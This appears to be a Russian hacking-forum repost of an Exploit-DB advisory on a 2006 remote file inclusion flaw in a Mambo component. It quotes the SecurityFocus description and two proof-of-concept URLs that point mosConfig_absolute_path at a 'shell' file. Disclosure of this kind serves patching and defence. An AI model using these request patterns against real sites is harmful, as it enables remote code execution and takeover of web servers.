Exploit Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28410
Проверка EDB
  1. Пройдено
Автор
O.U.T.L.A.W
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-08-21
Код:
source: https://www.securityfocus.com/bid/19621/info

The Mambo Display MOSBot Manager component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com/com_admin-copy_module/toolbar.admin-copy_module.php?mosConfig_absolute_path=shell http://www.example.com/com_admin-copy_module/admin.admin-copy_module.php?mosConfig_absolute_path=shell
 
Источник
www.exploit-db.com

Похожие темы